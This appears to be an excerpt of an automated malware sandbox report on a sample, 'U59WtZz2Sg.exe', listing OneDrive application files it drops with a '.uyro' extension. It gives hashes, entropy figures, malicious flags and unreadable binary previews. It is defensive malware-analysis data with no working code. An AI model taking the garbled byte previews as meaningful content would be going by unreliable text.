SHA-256:	0FE620ABE4342A67D02AB1C6D937787088194EBFADF6BC31A08AD1841EFBF9CE
SHA-512:	C87A7772DAA34C5051CA2B94EAF273C5B10B1B20F3BBD591356C8C3EFAB9B877F9AD6C4B1C7565253089BD309CCC889179A09B417716E31E43C992A0CA71E6B7
Malicious:	false
Reputation:	unknown
Preview:	.PNG.%...)..t9B...d,3...-p.Z..1F...}e~..I..0"EA...O.^\(.3..9........_Gm.....'...L..y...........\|..<. ?.#.M..N.d......3;.Qd.....K..Ji..ikW.A.Q...^D....y....%..Zi+..z7.n...;0........\..#....O.~.z./Mu.......`...q.M.H.0......1.8.Dh..6..M.+.b8.B...{.mM.D.A.G.%.....Ez....A.....Y...t..A7....-}...9Nh.y...<..1Y^...!]..Q..\......F..#....\|~\.v...~.6v.....o.....L.U.....D.&!...9.n.B..(B."._Cr.......7 ...'%.......R...G61j..%.^....E]._.4.{,..}.<...e,^..;..l.7..f..]....}..... .Q.m....`4{.."S....VX.tN.`.....@...`...b~P=..Q.2.\|[<..{...{..X.o."9...t.u.....mi..py...[w.)...&..;....Ic-r?e.+".L.......s..<.o..8..X "..\..b..I...]!.@>L..-..d.].e3.....1&].q.....=.I}l..OZj.iZ5........dB....f9... . .......+.].}..`()...{..-~.G..../yR.R.........-<....J=...].../i.>...q........G..\.J....:.jB.@.....D.....S&~..{J..qr.Dr..tUJ_%...a..&.9d.e.s...>;o.#..{M.f...V...y..k.U%./..!H.mXih.f.u....+.xq..K.f.^.H..I,......11#..ry....t.\|$.....BjL.......%=m...\|.C........0!.

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\AppErrorBlue.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6362
Entropy (8bit):	7.971393061617412
Encrypted:	false
SSDEEP:	192:01IpzVPD7nyQDKT0FZhSPLCkQCKwcJZAAAxB:06pRr7yQD1FZ2LzrKwKArL
MD5:	11A76ACA9BD82A0508081603497F3F60
SHA1:	0C1600331FA1DAF84396723D819EAC1E93A1C790
SHA-256:	0835539C15457D86FE65F07F8AA3AC117769C6A7ECD5C7537619F864E9DC0D8A
SHA-512:	74C1BE9BC2690350FDE26DEDF75EC584A4DAEA0AD813669CBD26B990F2699594BDFB2A5CA6566CF73B91972154241BA35BA2A9B527D27D2387E54C2D732DC84C
Malicious:	false
Reputation:	unknown
Preview:	.PNG..P.o..<..M.Y2.X..s.....f....;.NB5..[...:.7.F......wjD-Y.....0%.).\.u...`:..;...o.?.AMn.T6:..4h.-.r.....G<..:.=.18..]....u...A.....f]...i..t...B.....3...\|.s.\;.s...W.l.s{..Yd2.#..5..f..[..^.;.....e...)......F.Q.$..QG3..>.lJ]EM.#... .Te..w..>...+......n.....'w..$x3..qn7.H.z-^B.(...!..U.....V......c...8......8._...!mu......U...%u.S..A..J._q...Pown....."......X..35..d..v..T.2...*k..`dr....-.7$.r.. ..d..oD..u... u.L.4M7V....m\|.>..Pz..r.[....z\..........\|B.j.^....mS..z^.5%..R"i.%l.....`.Q.....b....e...ZgI...{.yv.p.V....7..[.f..(...K.J1A._<c...`.../c._qq."....P>.....6.G..a....Q..........}....w"..h..L.Q.p.z.a`nG.....`:W. ...a.......M..h.8..!.Df.d..N).....g.R.7^.s".....&t....~.........XH.[..G_?oQ.t.'...he..%T+8..$Y0.bH..~.V7..i.>...r......9.G...M0.,.o.x.#..^(..K.....^....)....&...k.!...9.cL../.sI.\|...O..K.B<].eH...k.\|L.<\|.......H..... .....8.G.."..9.\|.....L..R~..c.^.t.@.."o..1..h.....[....LE....5Z.f.p.>N..x...:#..'o..[.6.V.....Q.[k..v.A...n

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\AppErrorWhite.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5794
Entropy (8bit):	7.9679044157174665
Encrypted:	false
SSDEEP:	96:N782BBjh8eLlQ1wCxPr+cxwV2gGXE51Q52kEPlnFi5/QO7WFPeIguCIIVs:N784dZLlh+r+c6Qg151QEkE9nEWdeIgU
MD5:	15E13F7E46F69E7DF4EA87EB90A2742A
SHA1:	A6B41189ABCEF9A547270B2FAC3E3A473EBED0CB
SHA-256:	0462347D02BC51956DF72A6B11401F43F11B83461A90011F4B3B634F70A8C3B0
SHA-512:	8C4B879932F6BD0857B7EAC1702CF77E0313859EF8883500F62CFEE13A39B84C9D4BA16E95672D51F67EEBD5D2CD1E079391D1A59A45B7A9245C95D5AB064284
Malicious:	false
Reputation:	unknown
Preview:	.PNG....z{...S.....GZ.......%0.x\'.&.y)..{.1.......V..N....{....8.Q31.:.9.......d.T.:..R.z.5\|.....".).R..q.d..........sU..J....%....4.H...r...H...3...h.K.......V./_2.....r8..8..!...J..t<m....CI+..#v....P[.N,Z......&..7.^..#..#..(..........P..w}.!.QC...41....Vi.....2.3..q=.&..Q....J.......M.M.C...W..2../.@..?.e.tU,.3.#..Z..u..\..BY.:..uhI~K.........d.o..a...O..~..h...i.....FB...g`.=..y.>s......$.9`<c'.qS.d..d"....&!..m........P....u...Hp.Y.a..Bd1..uq.D"...%.I..8....!...7#4..i..z......,@.5X..Qhq&...w$.L...2.O.52h...M.nM..;.!V..S.\|:8......\.\..5...Edm`\|.-K...Q.,......UV9.c...4.}...H8V.cn.a......ru..3..w"[d.K"?"r.5H.Z...(...N.....I.5k.....7...#..9...._.....].L{e.S}d\|..a.:.op...4=R.).........A..).l..b2...f...3:.nU....-..G..f\.'.s6.~+...e......`..SG.!)..L..D.].. ..GnDH.....F.S..D.[......q...9.c..u.a.RIXkH.a....#.d,.z/........_S^[x....S.....9Y.&.A...2il...........%..I4.v.i...z...@.'..;V\V.h=....Q.(=->.....-..{..@_..V.a.J..4].]+.>..<z..

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\AppWhite.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4158
Entropy (8bit):	7.951908359162066
Encrypted:	false
SSDEEP:	96:/bWc1UrGrKBoPf0/LY5zbApVsLTnrZJ93ZYFw+2laezR:1mGrKBoPcLCbbvnrhZYFLUhzR
MD5:	AA3F124A6CDC17B4B7370F1AACD97E31
SHA1:	08C772D9CC32E0610D61489366DF7EC94B813DE6
SHA-256:	9B82F4C8556B910DC85651D3596B91F720BB97EF6675BB8F9BBE5C0D217BF740
SHA-512:	1FF58C11F3667613FD8209734735C49C220A1ED9BB42251178D632031A13387FD01EB90C482C8B4210CE1E845D36D72C877792C0C8E3A104B8DFA16804C505B8
Malicious:	false
Reputation:	unknown
Preview:	.PNG..`.o3%..<@c..6....-J..:..xB>fg.....Z..$........gy..5......@..A...g.B/.X./"K.~p.E$.82.a....z.......w.8{...NY...j.Y.B.....y...).`..1..P...$.l..9....j...j..=QMbD.`;...c..n.....Z/.o...j...Z...m.z.6...2.o.y.p.....5.<(~xi.4.."W.AGr...... L]..r.9j.....t....'`....Q..[~..2..Jb;,.h...."....z..,Y.!...A\S.g.F...1.......QL..3.aS...f+)".q.KU..F.!%..+...........c.Y@I^mS..'..bN4.~....>>.@...+.!.Fp,J......N........#..&."2.1v.&...v.........R.&.x.C..}N.;..YG.....>....-.......b.}......=39.t.l.p-.;..t:..~.o0_'m.d..l.$..V......#...$...eL.5@.1.....X.#X;.&.uU...<....m*3v..8..;.C_..eD.Q.Q.,.G.N.....m...<..435.+.n...j...._..x.D.v.J...... ....D...cN.Y...C.%i......a.b.g2my.8/3.-#...f..Fu\|-'.v.9.......2L..@......v.#...J.$..#..>..R....4E'............a9.k.@.......KZVA/...d.Z..g.m.Bc..bT.I.....>gC0.\|.A.C..7\|.T.#.\.v...v^(.R^.V.6..4.\|........R..%7N[..m...[.lV..i..pf....&..Uy...W..8.LUN./CJ&U..:~.....A.kZ.L....3q.O.?`Lo.p.G;5w#sZ....h....IWM..%`T3.(...o.....T.`..

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\AutoPlayOptIn.gif.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	GIF image data 32437 x 10601
Category:	dropped
Size (bytes):	383556
Entropy (8bit):	7.986098286544082
Encrypted:	false
SSDEEP:	6144:BfPzj5hJm803/pF6uQLEhvX8l7FtYXZp7epp+Z7Aj0K7PWH0vl8ee24FHvUbSvbu:tXz880PDKG8lxtY3euZm0KqH8l34Jrju
MD5:	9C0ECEF3A0C55CCD74D67998B35CAFC7
SHA1:	8765C026747DF60B367EC7372F1C547FD68E7E32
SHA-256:	FF7B89D878BD6158ECABA09297337228E523FF835DBC303FA2CBC53556769980
SHA-512:	5AB542B845956F27171CB75D8CD0F5CB3E0379FD1ADC66405F3EAD419B99629909A5628B01F56EBB9C2DDEB7EC4E14428C96BED84589C12BD44EC6810869624F
Malicious:	false
Reputation:	unknown
Preview:	GIF89..~i).+{...lV>`u...z[#.3E.A.=x."...].a9....;..'=.}.:..r..4.[o.C5....Cd.T.v..~..JL...v..U..Q....c'Fp..,..<...;p.K2.L3.g.$:...,...\|.2.`....[o...oV...YE.]......74Qe.-4BX]r......e...c.........a..k .Q^.G.&]...b........5..G....w..M.O...-<.C......Ul.f..~?uB.......g..c.uq.T......FL-...p.....B..MM\|1i.k.^........'..TF..>l.......d`.RvV..]!Xe.......L.Q.!.Z.....)i.J..........Gg-y."..Y.;.Q...b...i6...Z...n.V.g..........k.]..0..6-.:".r..9.t%.1.!.E.....f".....N..M](.x.[...5..Hx.].......4,m<.....C..?Z......k.......,p........k...g.~..@...g....P..&.6q..#".../x#.c..`Mo./.......UR. ..E'.8.5:..J).&..v2.Q!........"...380.HPj..-w....xH...........G.Y.}qjn.OD.QXo3&.b..7.<.j9.o.MApF..L........M.[o^.)y....A..Q.\|OC.b.....E.e.....dCFW;p..0.".4}.!..{....{..y..p..i.....+..H~;...f...."rq<.Vp..:/Z..&u!...;.E...O...v6.1...L../.._{z.&ELQs........X.,.Q.....Mn.1..e.t.0..u..\|.<.~}~&..NrEt.<..V....z7.....H1P%.'..}..?.y....-..{..!e..Sl.DN.EC..4~..)7,..<#...5.;... .J.u.?a6

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\AutoPlayOptIn.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	10560
Entropy (8bit):	7.982590977121402
Encrypted:	false
SSDEEP:	192:dxext+lNb34qNzCUzEJDu+SXKY4sgN2+6ZFRhIxs655MZiLgWwt:d4xORCUzL+uKYHehmv655NLgT
MD5:	CDDDEC7A2A71B269D7E63C12D9767705
SHA1:	D43232EC583D17D6B81E69A47C53AFF1FDE8556F
SHA-256:	773C392BB2F4A470A7192ED50A4012028F322D013707270ACB8EFB700D7841B8
SHA-512:	C3C3663AA789D3DED817B99E051FCF9D112B98D5F5C5CDD5569F685C2FC16C022AE61D5DF355FB555E68BD2202192FE80BEB020639FBC82402719CEC5E104EBA
Malicious:	false
Reputation:	unknown
Preview:	.PNG..N....z..........a...q$.m.&rI.Z.H.+..f.......ib......a.....=Z.S......-3.5l..-.........b.....=qa"....RU7i.8.~R......y..[.$....t.t4...;.@u.'.<v.T..].]"..fR..X. 2Ps...f^...{YTO.h.e...v....omH.<.1..D.r.M...]h...9k.,.I.b.._48rR\|.).....C>w...[........$.."...T......m....ybO..?A.C....9.A<_.Z.f...m{+J@lw.q..X.....S.Za..Y<.%.E.}...:....:..d..u..G....u.Q].qUWei..>.p.{.6.-...+..`...8.^.....5...:...9.w%t...fZ......[..O1.......S.1..qy=6o.:v..Yt..M#.H6.TX....W'9&Wn.y...}k.....b.e..P...Pp......#;e.Pj.d...F..N^..QlyW....[\|....@....g.3E~.v.I.. ".w.%.3q."...L......L........s\|....q_A(]..........+W.c<.t..O@.PPY.....-*..l~.i.7)o.W8.~...E'F...0...7.Xr.h.H.d....Y.4.6.Q.3.L...r.Z..zu/.po.....1....(.P..SPuxO[...q..v.v.h].!n{....v....#.(6.A.;...3Z..PVV$..)....)?0..'...../.TJ.{{.....h$..=.'.M.n....D..`.N..(3N...1'=S....i....C.l..h@'[.".`....j.v.f...tT..6......2.N)f..c..Q9.........p..b.E.s...2.1.'r..N.}..R....L"`...{0.Hag.Yt.F...3..A.}P.:...+..#.J.t...;t...

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\ElevatedAppBlue.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5028
Entropy (8bit):	7.961097587396169
Encrypted:	false
SSDEEP:	96:fIJMrZLJcoMeMjHpU2lylUrSJhdohk4fC6+LD/G53UlMqf:5lLJcosKJkkRf1f
MD5:	2B61A18F6FD381B471627A2D42CF2CA1
SHA1:	7E8318B12A293BA82744B5A53FD368AF6CF1B385
SHA-256:	DB4204BB7AADC32A2284A42C9972610E5222FE877AF7C17BFA711C9C8DA385F9
SHA-512:	82CAAB0609F4863D7DC0C530EA437C091868A1A71AA4C4A743EA3BE0AC663502AE43F4477A3730477952A899E4A68268E02E6E5263164B27FF067F362138F246
Malicious:	false
Reputation:	unknown
Preview:	.PNG...wG.......AG..........9x...........ZE.. .Q..%....sb......x....0?.?...i..LRyrL..w.U.z5._..7."z`s....O.........9..f..2.Y..C.XJ..,.X..v..z....8..n..".l@.H....)....'l..t+..T ."...g.L.....y..,`n....Xs.T........s}...(...<.D.L.7[.^.r...@_{R...w\|..o\|........&I...p.{.!.,.;.......v&....U...D.Y..}"/....>..'.h./.0..R:~..N`.AY..Q?w.\|..L.......i..I.......C.jL.Q.y@....m... .$.\.f...7..Vw0.nW.rs.Z......[H...........6.q..U....o..A.h..d...........'..V"L......W..D......$.....Kb.1.M.N..h.U.].$a..,..T...\8K%.\....A.=U..9.R.m@.B...`....X.c.d5t..\|+..5....4l......E..\|.Uo....P&..>...L..)i...G].^....e....9`b...\..P.^...kE..;.....h....}..O@...*5c.a..x.........+......``,...P~..<.X.d.~q.V..N..E....eu.D/.a..._.3..%...+...vFE.Pw.Q}.4..k.,..;..DG%...H.y ^.jg....b.......h.Ov.r......W>...Yj....f.\.?w.w....+.2.D...Yy..F..K.D...2Q_.:...a..._.2.,.I.N......K.....\|.......1..-.l.aG.\|..@b..o..a.0..9...y.S4..zuk..v5...f.r..;._....L...S.H.a.{".U.k#~~^...Q7.Y.FA~.

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\ElevatedAppWhite.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4540
Entropy (8bit):	7.960518734794481
Encrypted:	false
SSDEEP:	96:/n35N+gs/zPo4gCe98Y9EwTmJ8V/kr7O4yEuJpjJ7E8jij:f3/7QP51KEwY8ZkfOTvy
MD5:	3E5788A6208E7B2DCB20B31913E5C154
SHA1:	74A2F310A6F509312745D94EBCE2FCD078C94D01
SHA-256:	AED3F92EE4FA3549FBC0707A277ABB2EEEB84DF27D877DBAE8B7E2FFB99873C9
SHA-512:	BC20CBAF060A698FCE612FFAE20873188C8CD7160F14AE2BD002B4EAF1CB3CE005F90D7AA099D8A21A5268874939C029B9BFC682E9742B8724C8E4610AE71A1E
Malicious:	false
Reputation:	unknown
Preview:	.PNG......Cf.J)..~>...7+..&...0..ox-....vJ._.6.bt..R...+...^...a.R.,...........97.~._...=.....[0R............Sl..Vg.4%j...2=xt..],.........k.0.c.O.f..C....<..C2...0....9......$....b..6e7.n..[;!5.}b.V.b:d6.r".].Z....,.:..in..g'.....j-l.l.8...V..=.../.V...[xb....&.S..8..".]/9$.2.k..@.U%..6o\|.. .?c....)G..(`....f..K;........d.k..N/.7{u9..*.D...z'b..y.%v<^.-[..A.....;..z.h.c.B.......\|.\[.A.&m..0..dus.\.m.;..9...p~....YX.......R../..z..../.$....)...oI..V..t.c....R.&.......=..%....?.y.S..q.".^l.Gf.$.DQD.}.b..TRN>P.f....P.{i.-...8...s.5Q.7.6...8..........-O.3".....y..D.G..<.. .'.\MtL..J..xu......w.Q.PY...{W~.c..Z...e..P.f::...!........cB.N..(\.3...E......._.4"!..!E&.x.7...?.IPK,...%.....R.5....]..._,>T>{..2wv..Dj5Z>..Q......!.O.%......?KM...^!..'....bD2...AF8..j.}..>)K8oI."..c...5.....l;..G.......Fsd.~.hV..:.......d.,..UG../A1..L.....j!....A......G.OVv.^.V...G....b..yV.....#......d.V$)".U...Bv.....k......KY...0t}N.._NGK.-y..pR4...F..UnKW]...

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\Error.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7936
Entropy (8bit):	7.976190966046457
Encrypted:	false
SSDEEP:	192:TVtYrrj3yQGTj6C4TEz53XQvfHqqdjyIElfxFgeWXUr:/Yrrj3XejkSQfTd0dr
MD5:	6034904F37A0C3221002D041085E217D
SHA1:	B35BAD5DBC770157B61E5378706A9C45BD1150BE
SHA-256:	ED060276ACB8C230A4208BA8C3A1B5CBD62DE09E88DDF1BDD5917D67903BD0C1
SHA-512:	F3B5405E69C8101491237FDF6DB9FEE0D396AC211F92F69E7EDE3D44466CD9D32B7B26C37A7411581257556E1344068467D430369E8A0CC1DDCA5711DF07AA41
Malicious:	false
Reputation:	unknown
Preview:	.PNG....d\|j8.+.......f...~.O...R..Bj.F..J`.;.@...x.+...qq...../c..0...U.b..+..<..H..`-...x........m..>05{...O.S>..k.H...a....E.eU.......`.....s....R...sI6...7v..I.F..5w..S..........r.\|.`....5M.z.G...=F.........L......S..mu.Ke...)f....9..[Y>...Jn.e"6=........@s._Z.]......+.<....n....~.=m.W....<.g..g.Y..1.._.B...Pi.....,...V#9.0.B.o.....=.........=`i't..VF..8..~.z...C.\..\|....\|..S...~.A..........fMl.4...j=.Lhu!}V...\|.T.....9..o....5..V..(..C...l.....@l..I.ak...?....(M.E.............l...7....}.s.UMKC.;<E }a(MP...@&..f..`..<e..g.oXN5.W...L..u=..=.......?.vX....ZzJ..QP.W.o.x\|TD..^...ff..46^.n...w'gl......A)9 xW4....J..(..........y....t.)...C.K]<zw.p.ilS....u/..^.z..s>...u...........9.9.K.G..8..+........w^..+xO\|.e..3I.HIe..........t,q..>..Rm. .%.B..:.\|>.g....I....w..Q.K...6....3..D..'n<.cJ..9..,..5.Y.7.^S.` .#`..E9P..9...!S..eR.U.P+.8.0..OAT.q...W&....i.H.........rmV.Xv..O.uRk%R........y.. .]VmJ.tE...\|pa.J...U..3...Fp....\hiBe...6q.~._@...a/

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\ErrorPage.html.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6519
Entropy (8bit):	7.972168279022665
Encrypted:	false
SSDEEP:	96:HMXgpENJIy0jimvJlhY85dDknpzwPzp6BedwdkB+7JiaPa+wqHWCq+bUnkSNfl+1:HMNZRmvJJV4pkIUdwdk5lqgkS+DHJl
MD5:	404386971B9B9102EF2E7DE0B32DE840
SHA1:	0CCBCD6CCAFAD70350C184AD327ABA67C7D369F8
SHA-256:	7F103D9A6E3FAAB109E64170058549F06DE40C7C9058D075074A73949C588931
SHA-512:	A7ACB0D5B58129951DCB534CF0058E310FAF333168554B65138E600C4E6A5B2D25B6F43488392FCDADF94B2FC65E21512FCC1B0F8CD54D20AF782A3FF5A58D40
Malicious:	false
Reputation:	unknown
Preview:	<!DOCR.-i5\C.X...D.U[.............L..y.D.n<......K...`.]..&W.y.M.........V.im..{-..^c.s.!.6..P....D.>.S."..1...?7K@M....q..[.?....<.0C{....#..M....d.&.KW8.=.2v. ^I.R.v.1.2...O@..C..q.M..$..T..V.......s:.M.!..........e.Y.x.........9".x...r...D.D..w.f.........m....;b......`.:{....1.r..N;.=..$...Q(nr..+?SY.(..Q...1....}...h>ER9O..~.z.S.U.Y.+.vo.z.c.z.9.{M.....\|...i...d.D. JXa.jg....c.r?qa...1......7...?.].9U..x.c....`..p.:.v.....i......'f...;..nw;S...R....`.q..cv.j..".-.....Z..k.$....r....8..B......V..3nASd......`VCW..T4j..Ev..d.pMLg.....i...f....u.N.9>...h..M...Wm.S+_..^C.....O~...C.9....L......i..H4.....C4Z..\|%w..a9...$N,.U.#.Yw.P.8............\|..J.F....A...Y.......U......2.......\.H sg.....z.......(.e..V..cac...X.\| 9.t..3.-.h...2...,3#.. tMO.?{......Z...j;IJ..R.s.m`?P#N-!@<.?..s2..5.m=.#W.....`..K...NgK...-......%..X}f............K....f...r.h.B_..-UC.....J.v.vs....SHY....C8..)......`....r..^#.>.;.8...*i..'......0...^SGi.c..P?\|T\.../.

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	507518
Entropy (8bit):	6.917981645637591
Encrypted:	false
SSDEEP:	12288:xeFLCIFAvmxFpWeN2HIrgI96ME8fVZ0jGMj6wevus7H:xe9FAvmxPWikOIoVCj9BevXH
MD5:	F9B1E452E46938976A309A75A72AD229
SHA1:	AF61FA95831624B6A5DBFD42453A22E8C55CB140
SHA-256:	E54125D3A05B18ED3215F15E0617AE2035864636E7C235C1203551D8B74A3945
SHA-512:	586254BDCF23B0825EAE4626736ACBDC5A0AB185D81F61395F09A93D6FB1C85AF072441F10D5ACAD16AAEB18BBD4CE6BAE89BDA7077C1BEEDA4CBCAF8DD03368
Malicious:	true
Reputation:	unknown
Preview:	MZ.....$k9.%`...._.?.S.#...HM....'..D@%.&.v..U#C.Sj`9w.o.'..\|.).....i....:..h..Ny.h}U.=.@.m...#s..H3..\T_.7.,.+.Ys./e..r@`..k,..uI....0.i.%.ga..D....>...&K.:.!....<.T(.(...`..U..c!..nY..v.nb..d.{4.5....[\|.L.>8.>.C..M..8.......s:s...........2.......5-.%..F,.9.@.J......B...9....8.>...y....6)%2....cc...+....h\|m".......g._~.-..w.....,.i..<...{.....O......'a{......K.0.....S.q.........j.w-.....R}4......A._...-.%0.b..{q.sx.,.0s.\.....0..Ep...n.x..tks...L.....Q.].F...1._.C...g.}J?....'..'.+., ...>z-..?t.;...\.un.nxh..f......J.~....6.3...?.....h...b#-\.5.u.@a3.USH......6.Q..?!...7...RG;#....]G..f.....f....2....6.....5..._....lpj.X.{5.G...........t..a..8..R..?.[.6.).7........1}."E.UE.{%.....6.Ao\|.F.mH....}.=M'.5.d..\..h..s..T...X.V.2F.[..h.......R..~...(.g......2.......nIs.....w5R...........y..;.TT..x.....R...........Z.....-.[..K....R....:".TU..?O...,.8.D5.V.m.J&..B./.....+@]......Y#;..j........d..N-X.9'.Gh....F........%-L..M.>.Wn..)k...&..

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	313990
Entropy (8bit):	7.3463287993182025
Encrypted:	false
SSDEEP:	6144:4KK8Mg7TDmUSIYFSPfGvrgUuF/sBEeElGBY5K4:4n8/mUSIYFmfmbysmWYc4
MD5:	C13F20389E28EEBFC486DA5570F904ED
SHA1:	6D3954552D92E18A02521F2921EA6E2BFD726A89
SHA-256:	041CEA253A38F67C747D39B5A15C4EE8F8186FC77FE274D151AE516B5939D697
SHA-512:	AFF96B9FF1070451ABE841172B485EE59F8CFFC349CE12B3718AFA33672EB56571C3BEBD81CCE63A1CDCB083A66CF5A07FEA6FAFF88237674EF4260EDA7E3583
Malicious:	true
Reputation:	unknown
Preview:	MZ....ae...6.....$.m...>.t`..A..._....g.mTB..a....OG.(...r..II......0_.a...V...9HX8...[..3...YI...YS....t.n..Dnn.B........Bt..d......n..m..X$.~...P...#..r~j$...^..W...JtR...Ah..(J.m.....O\|...Va.7y..I[....K........J..t..a.i...<3Q_A.tarI.uY}.:.A.......Xi.....L2..$<x>.^+.y>=w.cP5......G..'....x.#.k..gs.K..............&..D...+..L..S.BQ...3:"d...i........%......J.y......VA. .)..H..OhR...p5Q_..A...W~.....;j.D..U......h....xI>.V.J..."x[Z...2K......X..:...D......j.YLM~..i\&.0.Nz-N GO.q..UZ..q.b..#.X:....R.N....?.b-`]..h;.Q..B.G5R....>.}..^.~..r.}j.K.p.u...i..\|v.Q.l.n..o..}.+f.+..<6Re.......\..i.X.,`6..&.e..K.J...N]b..Wup..r...@Z.A.........U=.r...RkStvOK\|.......j .Nz..4..!..9.U".v.....-..K.."H.Xn...._.......nH.L..>^..q.q.0.??..9. R...B.....U...z..s.*.'.6.....V.u.~R%~Y.n...i./...6...(L......EC[vs.\|u..;...\.,...8-R.e. .V...,..T.:.#(A~..1...gsL..<.H....Mc....'.cn}..0&...6}w!(^.$.!r.z.\|.d........TSB ..t.F......../....:...............u9..:

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncHelper.exe.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2109062
Entropy (8bit):	6.883016429350654
Encrypted:	false
SSDEEP:	49152:LOXkzUQ2eHpG690eiVBj4ItA2Q2hRD5zNrEE8pqA7SD1dQMWtT0co8GK3xiFolJq:aDeHpgeiVJR5JrEE8E38G3
MD5:	1785D3F7215353CD0AEBBF669425E18C
SHA1:	1B203BEE7D282FA5D04B147E01CAFD6B2609A590
SHA-256:	08881B24C02BEB5D19E4F1CBCEF64B92E065A5CB6CFA0821A441425FDE5BB2D1
SHA-512:	D9D0A185940A681ECDE5A8590D818112702E37F1749A28D0C5C6EDF27D0E56E0CA7BC35CBFA9900DB80C48523B953376B69D442CDB560D5C1BF4912AA7A6F882
Malicious:	true
Reputation:	unknown
Preview:	MZ...Xp%4.B~B.....bz.g.G...\|...x[5.q.P...o...r.....s.7=..X.......s..8y..1.........1n.!M)..o.7.~.....2..j....i....n.......nn.777]. ..40Fo.\|.....bw..hC....o.Q.USD..9K...2.>._..F.DP;.Y..9(BD.a...BH`.}.Ol.b...0.iJ.e.......L....mB..o_8..E.p...9...,.)w....kN.^..gu...S......8...0.r..i$UIV.G.SJ.Ob.Q..+.2.....<..p....D.u.2!.G..&b.u"...h..>._Ys$7M...F.n.b.....D)-.=:$\|..h.\..&4...z.l..\V7..a.Q....#Y"...x.2..W....:j!..]c.Q...%.x.O....m.E{oO..\r..........j9.........5]:Qp...&.....]98.B.xhqS.....N..K.WARMz.............Ovs5k..`.......7D.....~a.Ic..._..S.Xj..B:M...t.J,..Pr.w....^.U....dI.......Lm.s.AfV....B...JA.m.....j.62..m.<.Nu.....8a....3;".....x.`...MT.XK..=...0........<.(..6...@.g.&Q}.;Q.h.h.3s...2..e.Vz...!m9H...r.)H....<....B.6.?z.<C."4V...h..P..\|.t.....u.....d.(...;J..2.I...k... Q.t.N_....}%......f.a.9....GSj=.R...a..8i..,>$...%.4l.K....A.....\..v.a..k...F.....,.!.q......A/L..........."H.A.C.....+(...r..(.p..x.i..-4.....7..Qn\|.'..P'..1l

C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\KFMHeroToast.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	13301
Entropy (8bit):	7.987184207386081
Encrypted:	false
SSDEEP:	192:ve58MfkVjyaqP7DfOnHJShu/jhkX23TJGCOn8JPO3V9XCF6nCDVaWsAyX9QgOLfb:veX8VjSsICTJGL8BOqYeaWetmLfubjS
MD5:	6F2CCD93EEE7E24ADDB998B6296BD1E7
SHA1:	3D5FD373FF2698ECB748887600B3B2CFE5A7CD01
SHA-256:	8785524C37EB31877CD2C3708C44D972317CEC5A440F5BCDF46A082AC770DDB4
SHA-512:	3C175E7063B6497E8E1450514D1BFA364F11F7EEFE7E6CB7BA652D12569791DF92E7D03C6F9CA97AA3A8C2AC30E7D31DED544CFA753B3ED8CE70C6621BA2D37A
Malicious:	false
Reputation:	unknown
Preview:	.PNG......3...q.w..!,)~s..H..9..-._M.....wh...}.u..;...b..Q2..k.j.....a..opQ.f.Qn.?z[.....<J.W.....p..L@.....y.w.,.^@-......{#.N...7....'..]KE....4...Y-SKZ.9(.w}U..&G.D.....JA......4Ml........X..N.af.AE..i.m.@L.......1....\.I.....X5./1..ng.dp^.6.t'F\.:..G...".rNkq`.~......D.TP.}6."..K.~M....K...j..!.{C..Y.i.t....Y>j...:/.m@f......u+.H.[K.-...v.c} 